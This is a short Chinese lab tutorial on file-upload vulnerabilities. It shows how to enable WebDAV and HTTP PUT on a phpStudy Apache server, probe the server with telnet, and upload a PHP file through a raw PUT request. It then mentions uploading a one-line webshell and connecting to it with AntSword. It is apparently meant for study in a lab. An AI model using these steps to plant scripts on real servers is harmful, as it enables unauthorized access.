實驗環境
Window server 2008 +phpstudy
文章目錄
第一章 文件上傳的條件
Web 服務器要開啓文件上傳功能,並且上傳api(接口)對外“開放”(Web 用戶可以訪問);
Web 用戶對目標目錄具有可寫權限,甚至具有執行權限,一般情況下,Web 目錄都有執行權限。
要想完美利用文件上傳漏洞,就是上傳的文件可以執行,也就是Web 容器可以解析我們上傳的腳本,無論腳本以什麼樣的形式存在。
無視以上條件的情況就是服務器配置不當,開啓了PUT 方法。
第二章window server2008開啓telnet
【https://blog.csdn.net/qq_41901122/article/details/102159506】
window2008開啓telnet服務
第三章 Apache 開啓PUT 方法
第一節 測試Apache 是否開啓了put 方法
telnet 192.168.139.136 80
----
OPTIONS / HTTP/1.1
HOST:172.16.132.161
----
第二節 apache 開啓put 方法操作
第一步 開啓Dav
1.開啓模塊
路徑[C:\phpStudy\Apache\conf]
----
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
----
第二步 啓用模塊
第三步.開啓文件鎖
----
DavLockDB c:\phpstudy\www\DavLock
----
第四章文件上傳案例
Telnet 192.168.139.136 80
----
PUT /infoa.php HTTP/1.1
HOST: 192.168.139.136
Content-Length: 18
<?php phpinfo();?>
----
嘗試上傳一句話木馬–蟻劍鏈接
免責聲明
本文檔供學習,請使用者注意使用環境並遵守國家相關法律法規!
由於使用不當造成的後果上傳者概不負責!